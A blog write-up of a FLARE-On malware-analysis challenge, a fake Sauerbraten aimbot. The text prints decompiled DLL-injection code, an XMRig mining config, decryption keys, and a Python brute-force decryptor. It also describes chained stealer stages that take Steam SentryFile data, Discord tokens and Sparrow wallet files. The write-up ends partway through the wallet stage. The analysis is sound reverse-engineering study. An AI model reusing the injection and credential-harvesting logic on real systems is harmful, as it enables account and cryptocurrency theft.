<p><strong><em>Cover Illustration by mocapoca_, the illustration is purchasable via</em></strong> <a target="_blank" href="https://twitter.com/mocapoca_/status/1728761352469324072">https://twitter.com/mocapoca_/status/1728761352469324072</a> (Indonesian only)</p>
</blockquote>
<p>This is a write up of FLARE-ON Challenge 4, which is unfortunately where I stopped doing the challenges due to work and also purely because it got harder after this. I guess for me, stopping at a cheating software for my first ever FLARE-On attempt is kinda… funny.</p>
<h2 id="heading-initial-file">Initial File</h2>
<p>After extracting the file, we obtained one executable file called <code>aimbot.exe</code>. This is an aimbot for the open-source FPS <a target="_blank" href="http://sauerbraten.org/">Sauerbraten</a>. Upon execution it creates a window titled BananaAimBot that can launch the game with the purported aimbot. Looking at it in IDA, we can see that BananaAimBot is spawned with the callback function <code>sub_402AF0</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701949180603/9c25f73a-39a0-428d-9728-019c234afd56.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-c"><span class="hljs-function">LRESULT __fastcall <span class="hljs-title">sub_402AF0</span><span class="hljs-params">(HWND hWndParent, UINT a2, WPARAM a3, HGDIOBJ a4)</span>
</span>{
    HINSTANCE hInstance; <span class="hljs-comment">// rax</span>
    HINSTANCE WindowLongPtrA; <span class="hljs-comment">// rax</span>

    <span class="hljs-keyword">if</span> ( a2 == <span class="hljs-number">2</span> )
    {
        DeleteObject(ho);
        PostQuitMessage(<span class="hljs-number">0</span>);
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
    }
    <span class="hljs-keyword">if</span> ( a2 == WM_COMMAND )
    {
        <span class="hljs-keyword">if</span> ( ho == a4 &amp;&amp; (a3 &amp; CCM_COMMANDID_MASK_RESERVED) == <span class="hljs-number">0</span> )
        {
            ShowWindow(hWndParent, <span class="hljs-number">0</span>);
            sub_402150();
            ExitProcess(<span class="hljs-number">0</span>);
        }
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
    }
    <span class="hljs-keyword">if</span> ( a2 != <span class="hljs-number">1</span> )
        <span class="hljs-keyword">return</span> DefWindowProcA(hWndParent, a2, a3, (LPARAM)a4);
    hInstance = (HINSTANCE)GetWindowLongPtrA(hWndParent, <span class="hljs-number">-6</span>);
    ho = CreateWindowExW(
        <span class="hljs-number">0</span>,
        <span class="hljs-string">L"BUTTON"</span>,
        <span class="hljs-string">L"Launch Sauerbraten with Aimbot!"</span>,
        <span class="hljs-number">0x50010001</span>u,
        <span class="hljs-number">10</span>,
        <span class="hljs-number">70</span>,
        <span class="hljs-number">300</span>,
        <span class="hljs-number">30</span>,
        hWndParent,
        <span class="hljs-number">0</span>i64,
        hInstance,
        <span class="hljs-number">0</span>i64);
</code></pre>
<p>Every time the button is clicked, the function calls <code>sub_402150</code>, which checks for the game and its version via a hardcoded MD5 hash, <code>180B22A08CF0C6D76C7AA5FF170BBF2D</code>. This means that the aimbot only works for a specific version of Sauerbraten, specifically version <code>2020_12_21</code>, which is available via <a target="_blank" href="https://sourceforge.net/projects/sauerbraten/files/sauerbraten/2020_11_29/sauerbraten_2020_12_21_windows.exe#/dl.7z">Sourceforge</a>.</p>
<pre><code class="lang-c">sub_404650();
<span class="hljs-built_in">strcpy</span>(v52, <span class="hljs-string">"%PROGRAMFILES(X86)%\\Sauerbraten\\bin64\\sauerbraten.exe"</span>);
ExpandEnvironmentStringsA(v52, v56, <span class="hljs-number">0x400</span>u);
ExpandEnvironmentStringsA(<span class="hljs-string">"%PROGRAMFILES(X86)%\\Sauerbraten"</span>, v57, <span class="hljs-number">0x400</span>u);
FileA = CreateFileA(v56, <span class="hljs-number">0x80000000</span>, <span class="hljs-number">1u</span>, <span class="hljs-number">0</span>i64, <span class="hljs-number">3u</span>, <span class="hljs-number">0x80</span>u, <span class="hljs-number">0</span>i64);
v1 = FileA;
<span class="hljs-keyword">if</span> ( FileA != (HANDLE)<span class="hljs-number">-1</span>i64 )
{
    <span class="hljs-keyword">if</span> ( !GetFileSizeEx(FileA, &amp;v49) || (LowPart = v49.LowPart, v3 = <span class="hljs-built_in">malloc</span>(v49.QuadPart), (v4 = v3) == <span class="hljs-number">0</span>i64) )
    {
        CloseHandle(v1);
        <span class="hljs-keyword">return</span>;
    }
    <span class="hljs-keyword">if</span> ( !ReadFile(v1, v3, LowPart, &amp;data, <span class="hljs-number">0</span>i64) )
    {
        CloseHandle(v1);
        <span class="hljs-built_in">free</span>(v4);
        <span class="hljs-keyword">return</span>;
    }
    CloseHandle(v1);
    sub_402C60(v54);
    sub_402000(v54, (__int64)v4, data);
    calcMD5(v54);
    <span class="hljs-keyword">if</span> ( v54[<span class="hljs-number">11</span>] == <span class="hljs-number">0xD7C6F08CA0220B18</span>ui64 &amp;&amp; v54[<span class="hljs-number">12</span>] == <span class="hljs-number">0x2DBF0B17FFA57A6C</span>i64 )
    {
        <span class="hljs-built_in">free</span>(v4);
        <span class="hljs-built_in">memset</span>(v58, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(v55));
</code></pre>
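<p>The two 64-bit constants in the comparison are simply the 16 MD5 digest bytes read as little-endian integers, which is why they look nothing like the hash string at first glance. Here is a small sketch that rebuilds the hex string from them; <code>digest_words_to_hex</code> is just an illustrative name, not something from the binary.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

// Writes the hex form of a 16-byte digest that was split into two
// little-endian 64-bit words, the way the decompiled comparison sees it.
// out must have room for 33 bytes (32 hex digits plus the terminator).
void digest_words_to_hex(uint64_t lo, uint64_t hi, char out[33])
{
    const uint64_t words[2] = { lo, hi };
    for (int w = 0; w &lt; 2; w++) {
        for (int b = 0; b &lt; 8; b++) {
            // Little-endian: the lowest byte of the word comes first.
            unsigned byte = (unsigned)((words[w] &gt;&gt; (8 * b)) &amp; 0xFF);
            snprintf(out + (w * 8 + b) * 2, 3, "%02X", byte);
        }
    }
}
</code></pre>
<p>Calling it with <code>0xD7C6F08CA0220B18</code> and <code>0x2DBF0B17FFA57A6C</code> gives back <code>180B22A08CF0C6D76C7AA5FF170BBF2D</code>, the hash mentioned earlier.</p>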
<h2 id="heading-dropped-files">Dropped Files</h2>
<p>After that, the program decrypts <code>miner.exe</code>, <code>config.json</code>, and <code>aimbot.dll</code>, then extracts the files into a folder at <code>C:\Users\user\AppData\Roaming\BananaBot</code>. The decryption uses standard AES-128/ECB with the key <code>yummyvitamincjoy</code>. The key is hardcoded in plaintext in the code.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Inside decrypt_resource_401F50(void *buf, size_t Size):</span>
AES_key_derivation_401BA0(aes_ctx, <span class="hljs-string">"yummyvitamincjoy"</span>);
</code></pre>
<p>The program then executes <code>miner.exe</code>, which is a legit copy of XMRig used to mine Monero using CPU resources. It then sends an HTTP GET request to <a target="_blank" href="http://127.0.0.1:57328/2/summary">http://127.0.0.1:57328/2/summary</a>, the address the XMRig sample's HTTP API is configured to listen on via <code>config.json</code>.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"http"</span>: {
        <span class="hljs-attr">"enabled"</span>: <span class="hljs-literal">true</span>,
        <span class="hljs-attr">"host"</span>: <span class="hljs-string">"127.0.0.1"</span>,
        <span class="hljs-attr">"port"</span>: <span class="hljs-number">57328</span>,
        <span class="hljs-attr">"access-token"</span>: <span class="hljs-literal">null</span>,
        <span class="hljs-attr">"restricted"</span>: <span class="hljs-literal">true</span>
    },
    <span class="hljs-attr">"autosave"</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"cpu"</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"opencl"</span>: <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"cuda"</span>: <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"pools"</span>: [
        {
            <span class="hljs-attr">"url"</span>: <span class="hljs-string">"monerohash.com:9999"</span>,
            <span class="hljs-attr">"user"</span>: <span class="hljs-string">"49jmq1dCvnAAGpeb6aCFyuaXNB8WMJ6fqLTG4twcSjwyNgHagoaQw5EbCw4mf832RPRpf2CH4srVhAxgtSb6A62P2VwJC47"</span>,
            <span class="hljs-attr">"keepalive"</span>: <span class="hljs-literal">true</span>,
            <span class="hljs-attr">"tls"</span>: <span class="hljs-literal">true</span>
        }
    ]
}
</code></pre>
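<p>A minimal sketch of that liveness check, assuming the loader only needs the endpoint to answer and the body to contain the <code>"version": "</code> marker. The function names and the timeout are illustrative and do not come from the sample; the URL and user agent are the strings recovered from the DLL later in this write-up.</p>
<pre><code class="lang-python">import urllib.request

# URL and user agent are the strings recovered from the DLL;
# the function names and the timeout are illustrative assumptions.
SUMMARY_URL = "http://127.0.0.1:57328/2/summary"
USER_AGENT = "bananabot 5000"


def probe_summary(url=SUMMARY_URL, user_agent=USER_AGENT, timeout=2.0):
    """Return the response body if the HTTP API answers, else None."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.read()
    except OSError:
        # Connection refused, timeout, or HTTP error: treat as "not running".
        return None


def miner_is_running(body):
    """Assumed check: the summary body must contain the version marker."""
    return body is not None and b'"version": "' in body


if __name__ == "__main__":
    print(miner_is_running(probe_summary()))
</code></pre>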
<p>When the GET request succeeds, the program knows XMRig is active. It then launches the game and injects <code>aimbot.dll</code> into it: it copies the DLL's file path into the memory space of the target process, then invokes <code>LoadLibraryA</code> through <code>CreateRemoteThread</code> within the context of that process.</p>
<pre><code class="lang-c"><span class="hljs-function">_BOOL8 __fastcall <span class="hljs-title">sub_401E80</span><span class="hljs-params">(HANDLE hProcess_Sauerbraten, <span class="hljs-keyword">char</span> *aimbot_dll)</span>
</span>{
    SIZE_T v4; <span class="hljs-comment">// rax</span>
    <span class="hljs-keyword">void</span> *v5; <span class="hljs-comment">// rdi</span>
    SIZE_T v6; <span class="hljs-comment">// rax</span>
    HMODULE ModuleHandleA; <span class="hljs-comment">// rax</span>
    HMODULE (__stdcall *LoadLibraryA)(LPCSTR); <span class="hljs-comment">// rax</span>

    v4 = <span class="hljs-built_in">strlen</span>(aimbot_dll);
    v5 = VirtualAllocEx(hProcess_Sauerbraten, <span class="hljs-number">0</span>i64, v4, <span class="hljs-number">0x3000</span>u, <span class="hljs-number">0x40</span>u);
    <span class="hljs-keyword">if</span> ( v5
        &amp;&amp; (v6 = <span class="hljs-built_in">strlen</span>(aimbot_dll), WriteProcessMemory(hProcess_Sauerbraten, v5, aimbot_dll, v6, <span class="hljs-number">0</span>i64))
        &amp;&amp; (ModuleHandleA = GetModuleHandleA(<span class="hljs-string">"kernel32.dll"</span>),
            (LoadLibraryA = (HMODULE (__stdcall *)(LPCSTR))GetProcAddress(ModuleHandleA, <span class="hljs-string">"LoadLibraryA"</span>)) != <span class="hljs-number">0</span>i64) )
    {
        <span class="hljs-keyword">return</span> CreateRemoteThread(hProcess_Sauerbraten, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, (LPTHREAD_START_ROUTINE)LoadLibraryA, v5, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>i64) != <span class="hljs-number">0</span>i64;
    }
    <span class="hljs-keyword">else</span>
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
    }
}
</code></pre>
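<p>The two magic numbers passed to <code>VirtualAllocEx</code> are easier to read once they are mapped back to their Windows SDK names. The short check below does that. The full DLL path is an assumption built from the extraction folder mentioned earlier.</p>
<pre><code class="lang-python"># Constants from the Windows SDK headers (winnt.h).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

# Arguments as they appear in the decompiled VirtualAllocEx call.
allocation_type = 0x3000
protection = 0x40

assert allocation_type == (MEM_COMMIT | MEM_RESERVE)
assert protection == PAGE_EXECUTE_READWRITE

# Assumed path: the extraction folder plus the DLL name.
dll_path = b"C:\\Users\\user\\AppData\\Roaming\\BananaBot\\aimbot.dll"

# strlen() excludes the terminating NUL, so exactly len(dll_path) bytes are
# written. Freshly committed pages are zero-filled, which is what leaves the
# string NUL-terminated when LoadLibraryA reads it in the target process.
print(len(dll_path), "bytes written into the remote allocation")
</code></pre>
<p>In other words, the loader commits and reserves a read-write-execute region in the game process, even though the region only ever holds a path string.</p>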
<h2 id="heading-aimbotdll-and-its-anti-debug-functions">Aimbot.dll and Its Anti-Debug Functions</h2>
<p><code>aimbot.dll</code> starts three threads:</p>
<ul>
<li><p>A thread for the aimbot's cheating functions, which calls <code>GetAsyncKeyState</code> and common math functions like <code>atan2</code> and <code>sqrt</code>. This thread is irrelevant to the challenge, but the aimbot does work in-game</p>
</li>
<li><p>A thread for anti-debugging functions, which contains</p>
<ul>
<li><p>Windows API anti-debugging checks through <code>IsDebuggerPresent</code>, <code>CheckRemoteDebuggerPresent</code>, and <code>DbgBreakPoint</code></p>
</li>
<li><p>Checks for running debuggers such as <code>IDA</code> and <code>x64dbg</code> through hardcoded checksum validations</p>
</li>
<li><p>Checks that the DLL is running inside the game by constantly reading the memory of the process's main module and of the parent process</p>
</li>
</ul>
</li>
<li><p>A thread for the cheating software's infostealing functions</p>
</li>
</ul>
<p>Due to the anti-debug functions, we will need to decrypt the payload without dynamic analysis. Analyzing the DLL statically, the strings at address <code>0x62FE4020</code> stand out. They are decoded in function <code>62f439b0()</code> using the hardcoded XOR key <code>A9F89964</code>, which gets us:</p>
<ul>
<li><p><a target="_blank" href="http://127.0.0.1:57328/2/summary"><code>http://127.0.0.1:57328/2/summary</code></a> &lt;- the XMRig location</p>
</li>
<li><p><code>bananabot 5000</code> &lt;- name of the user agent</p>
</li>
<li><p><code>"version": "</code> &lt;- XMRig version check</p>
</li>
<li><p><code>the decryption of this blob was successful</code></p>
</li>
</ul>
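<p>A rough sketch of that string decoding, assuming a plain repeating-key XOR and that the key bytes are applied in the order they are written (<code>A9 F8 99 64</code>). The DLL may store them in the opposite byte order, so treat the key layout as a guess. The helper name is hypothetical.</p>
<pre><code class="lang-python">from itertools import cycle

# Hardcoded key from the write-up, taken here as the four bytes A9 F8 99 64
# in the order written (an assumption; the DLL may store them reversed).
XOR_KEY = bytes.fromhex("A9F89964")


def xor_repeating(data, key=XOR_KEY):
    """XOR data with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Round trip on one of the recovered strings to show the symmetry.
encoded = xor_repeating(b"bananabot 5000")
print(encoded.hex())
print(xor_repeating(encoded))
</code></pre>
<p>Because XOR is its own inverse, the same helper can be pointed at the bytes dumped from <code>0x62FE4020</code> to recover the strings listed above.</p>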
<p>My initial plan was a brute-force attack on the last four bytes of the AES-128 key. The <code>strstr</code> call looks for the phrase <code>"version": "</code>, which is 12 characters long, so the first 12 bytes of the key are known and the rest should be printable ASCII characters. Since an AES-128 key is 16 bytes long, only the remaining four bytes need to be recovered.</p>
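<p>To make the key layout concrete, here is a small sketch. It assumes the key is simply the 16 bytes that start at the <code>"version": "</code> match in XMRig's summary response. The sample body and the helper name are made up for illustration. It also shows how much narrowing the alphabet shrinks the search.</p>
<pre><code class="lang-python">from string import digits, printable

MARKER = b'"version": "'


def key_from_summary(body):
    """Return the 16 bytes starting at the marker, or None if unavailable."""
    start = body.find(MARKER)
    if start == -1:
        return None
    key = body[start:start + 16]
    return key if len(key) == 16 else None


# Hypothetical response fragment; the real version string is exactly what
# the brute force has to recover.
sample = b'{"id": "abc", "version": "1.2.3", "kind": "miner"}'
print(len(MARKER))               # 12 known key bytes
print(key_from_summary(sample))

# Search space for the four unknown bytes.
print(len(printable) ** 4)       # 100000000 with any printable character
print(len(digits + ".") ** 4)    # 14641 with digits and dots only
</code></pre>
<p>Restricting the candidates to digits and dots, as a version number would suggest, keeps the search to a few thousand AES decryptions.</p>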
<p>I first tried to recover an XOR keystream from a known plaintext segment and apply it to the rest of the ciphertext. This didn't work: ECB is a block mode with no keystream, so XORing plaintext against ciphertext gives different bytes for every distinct block.</p>
<p>What does work is using the known plaintext as a check. The decrypted payload has to begin with <code>the decryption of this blob was successful</code>, so for each candidate key we decrypt only the first 16 bytes of the ciphertext and compare the result with the first 16 bytes of that string. Once a key matches, it decrypts the rest of the payload.</p>
<pre><code class="lang-python"><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> product
<span class="hljs-keyword">from</span> string <span class="hljs-keyword">import</span> digits
<span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES
<span class="hljs-keyword">from</span> Crypto.Hash <span class="hljs-keyword">import</span> SHA256

key_prefix = <span class="hljs-string">'"version": "'</span>
known_plaintext = <span class="hljs-string">b"the decryption of this blob was successful"</span>
alphabet = digits + <span class="hljs-string">"."</span>

<span class="hljs-comment"># Read the first 16 bytes of ciphertext</span>
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470.bin"</span>, <span class="hljs-string">"rb"</span>) <span class="hljs-keyword">as</span> f:
    ciphertext = f.read(<span class="hljs-number">16</span>)

print(<span class="hljs-string">"Bruteforcing last 4 chars"</span>)
<span class="hljs-keyword">for</span> key_suffix <span class="hljs-keyword">in</span> product(alphabet, repeat=<span class="hljs-number">4</span>):
    key = bytes(key_prefix + <span class="hljs-string">""</span>.join(key_suffix), <span class="hljs-string">"UTF-8"</span>)
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext)
    <span class="hljs-keyword">if</span> plaintext == known_plaintext[:<span class="hljs-number">16</span>]:
        print(<span class="hljs-string">f"Success, key = <span class="hljs-subst">{key}</span>"</span>)
        <span class="hljs-keyword">break</span>

print(<span class="hljs-string">"Decrypting payload"</span>)
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470.bin"</span>, <span class="hljs-string">"rb"</span>) <span class="hljs-keyword">as</span> f:
    ciphertext = f.read()

cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)
h = SHA256.new()
h.update(plaintext)

print(<span class="hljs-string">f"SHA256 = <span class="hljs-subst">{h.hexdigest()}</span>"</span>)
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470_decrypted.bin"</span>, <span class="hljs-string">"wb"</span>) <span class="hljs-keyword">as</span> f:
    f.write(plaintext)
</code></pre>
<p>With this, we can continue decrypting the shellcode, which consists of a series of chained blobs that execute in sequence. Each blob extracts information from a specific program, copies it to <code>C:\depot</code>, and then uses an RC4 key derived from that program's config files to decrypt the next blob of the malware.</p>
<h2 id="heading-steamguard-infostealer">SteamGuard Infostealer</h2>
<p>The first stage targets Steam's <code>config.vdf</code>, which contains the <code>SentryFile</code> entry pointing to the SSFN file that stores your SteamGuard authentication.</p>
<pre><code class="lang-python">seg000:<span class="hljs-number">00000000000008</span>AE <span class="hljs-number">22</span> <span class="hljs-number">53</span> <span class="hljs-number">65</span> <span class="hljs-number">6</span>E <span class="hljs-number">74</span> <span class="hljs-number">72</span> <span class="hljs-number">79</span> <span class="hljs-number">46</span>…aSentryfile     db <span class="hljs-string">'"SentryFile"'</span>,<span class="hljs-number">0</span>     ; DATA XREF: sub_5FC:loc_693↑o
seg000:<span class="hljs-number">00000000000008</span>BB <span class="hljs-number">43</span> <span class="hljs-number">3</span>A <span class="hljs-number">5</span>C <span class="hljs-number">50</span> <span class="hljs-number">72</span> <span class="hljs-number">6</span>F <span class="hljs-number">67</span> <span class="hljs-number">72</span> aCProgramFilesX db <span class="hljs-string">'C:\Program Files (x86)\Steam\config\config.vdf'</span>,<span class="hljs-number">0</span>
seg000:<span class="hljs-number">00000000000008</span>BB <span class="hljs-number">61</span> <span class="hljs-number">6</span>D <span class="hljs-number">20</span> <span class="hljs-number">46</span> <span class="hljs-number">69</span> <span class="hljs-number">6</span>C <span class="hljs-number">65</span> <span class="hljs-number">73</span>…                                        ; DATA XREF: sub_5FC+<span class="hljs-number">11</span>↑o
seg000:<span class="hljs-number">00000000000008</span>EA <span class="hljs-number">43</span> <span class="hljs-number">3</span>A <span class="hljs-number">5</span>C <span class="hljs-number">64</span> <span class="hljs-number">65</span> <span class="hljs-number">70</span> <span class="hljs-number">6</span>F <span class="hljs-number">74</span> aCDepotSteamSsf db <span class="hljs-string">'C:\depot\steam_ssfn'</span>,<span class="hljs-number">0</span>
seg000:<span class="hljs-number">00000000000008</span>EA <span class="hljs-number">5</span>C <span class="hljs-number">73</span> <span class="hljs-number">74</span> <span class="hljs-number">65</span> <span class="hljs-number">61</span> <span class="hljs-number">6</span>D <span class="hljs-number">5</span>F <span class="hljs-number">73</span>…                                        ; DATA XREF: sub_5FC+<span class="hljs-number">12</span>D↑o
seg000:<span class="hljs-number">00000000000008</span>FE <span class="hljs-number">74</span> <span class="hljs-number">68</span> <span class="hljs-number">65</span> <span class="hljs-number">20</span> <span class="hljs-number">64</span> <span class="hljs-number">65</span> <span class="hljs-number">63</span> <span class="hljs-number">72</span> aTheDecryptionO db <span class="hljs-string">'the decryption of this blob was successful'</span>,<span class="hljs-number">0</span>
</code></pre>
<p>Within this file you can find:</p>
<pre><code class="lang-c"><span class="hljs-string">"InstallConfigStore"</span>
{
    <span class="hljs-string">"Software"</span>
    {
        <span class="hljs-string">"Valve"</span>
        {
            <span class="hljs-string">"Steam"</span>
            {
                <span class="hljs-string">"AutoUpdateWindowEnabled"</span>        <span class="hljs-string">"0"</span>
                <span class="hljs-string">"ShaderCacheManager"</span>
                {
                    <span class="hljs-string">"HasCurrentBucket"</span>        <span class="hljs-string">"1"</span>
                    <span class="hljs-string">"CurrentBucketGPU"</span>        <span class="hljs-string">""</span>
                    <span class="hljs-string">"CurrentBucketDriver"</span>        <span class="hljs-string">""</span>
                }
                <span class="hljs-string">"SentryFile"</span>        <span class="hljs-string">"C:\\Program Files (x86)\\steam\\ssfnXXXXXXXXXXXXXXXXXXX"</span>
                <span class="hljs-string">"Accounts"</span>
                {
                    <span class="hljs-string">"xxxxxxx"</span>
                    {
                        <span class="hljs-string">"SteamID"</span>        <span class="hljs-string">"xxxxxxxxxxxxx"</span>
                    }
                }
</code></pre>
<p>The RC4 key schedule (KSA) is called with a 16-byte key, and the first 42 bytes of the next stage, once decrypted, are again <code>the decryption of this blob was successful</code>. The RC4 key is the first 16 characters of the <code>config.vdf</code> file, which is <code>"InstallConfigSt</code> (the leading quote is part of the key).</p>
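<p>The chaining can be reproduced offline with a few lines of Python. This is a sketch that assumes the stages use unmodified RC4. The helper names are mine, and the blob here is a stand-in, since the real ciphertext is not reproduced in this post.</p>
<pre><code class="lang-python">KNOWN_PLAINTEXT = b"the decryption of this blob was successful"


def rc4(key, data):
    """Plain RC4: key scheduling (KSA) followed by keystream XOR (PRGA)."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]

    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)


def blob_decrypts_cleanly(key, blob):
    """A stage counts as decrypted when it starts with the marker string."""
    return rc4(key, blob).startswith(KNOWN_PLAINTEXT)


# Self-check with a stand-in blob encrypted under the Steam stage key.
steam_key = b'"InstallConfigSt'
fake_blob = rc4(steam_key, KNOWN_PLAINTEXT + b"\x90\x90")
print(len(steam_key), blob_decrypts_cleanly(steam_key, fake_blob))
</code></pre>
<p>The same <code>blob_decrypts_cleanly</code> check applies to every later stage, since each one starts with the same 42-byte marker.</p>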
<h2 id="heading-discord-stealer">Discord Stealer</h2>
<p>The next stage of the malware looks a bit less straightforward at first sight, but it is simpler (and funnier) than the one before.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000E71</span> FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000E75</span> A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000E79</span> <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000E7</span>D <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
seg000:<span class="hljs-number">0000000000000E81</span> <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
seg000:<span class="hljs-number">0000000000000E85</span> <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
seg000:<span class="hljs-number">0000000000000E89</span> AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
seg000:<span class="hljs-number">0000000000000E8</span>D AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000E91</span> <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000E95</span> <span class="hljs-number">5</span>E <span class="hljs-number">89</span> EC <span class="hljs-number">99</span>                             dd <span class="hljs-number">99</span>EC895Eh            ; kernel32.dll!CopyFileA
seg000:<span class="hljs-number">0000000000000E99</span> D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
seg000:<span class="hljs-number">0000000000000E9</span>D F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000</span>EA1 <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
seg000:<span class="hljs-number">0000000000000</span>EA5 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
</code></pre>
<p>The malware searches for <code>.ldb</code> files (LevelDB table files) in <code>C:\Users\three\AppData\Roaming\Discord\Local Storage\leveldb</code> and looks for <code>dQw4w9WgXcQ</code> (the YouTube video ID of Rick Astley's Never Gonna Give You Up, which Discord uses as the prefix for its stored encrypted tokens) in the contents of each <code>.ldb</code> file. It then reads the first 16 bytes of the file <code>C:\Users\three\AppData\Roaming\Discord\Network\Origin Bound Certs</code> to get the RC4 key for the next blob, which is <code>SQLite format 3\0</code>.</p>
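<p>An analyst can mirror both steps on a copy of the profile to see which files this stage would pick up. The sketch below uses hypothetical helper names and works on any directory you point it at. It approximates the behaviour described above and is not a reimplementation of the shellcode.</p>
<pre><code class="lang-python">from pathlib import Path

MARKER = b"dQw4w9WgXcQ"


def files_containing_marker(directory, marker=MARKER, suffix=".ldb"):
    """Return files in directory with the given suffix that contain marker."""
    hits = []
    for path in sorted(Path(directory).glob("*" + suffix)):
        if marker in path.read_bytes():
            hits.append(path)
    return hits


def leading_key(path, size=16):
    """Read the first size bytes of a file, which this stage uses as its key."""
    with open(path, "rb") as handle:
        return handle.read(size)


# The SQLite header magic is exactly 16 bytes, including the trailing NUL,
# which is why any SQLite database yields the same RC4 key.
print(len(b"SQLite format 3\x00"))
</code></pre>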
<h2 id="heading-sparrow-wallet-stealer">Sparrow Wallet Stealer</h2>
<p>The third stage targets the Sparrow cryptocurrency wallet, which I'm honestly less familiar with.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000</span>EF4 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>EF8 A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>EFC <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000F</span>00 <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
seg000:<span class="hljs-number">0000000000000F</span>04 <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
seg000:<span class="hljs-number">0000000000000F</span>08 <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
seg000:<span class="hljs-number">0000000000000F</span>0C AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
seg000:<span class="hljs-number">0000000000000F</span>10 AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
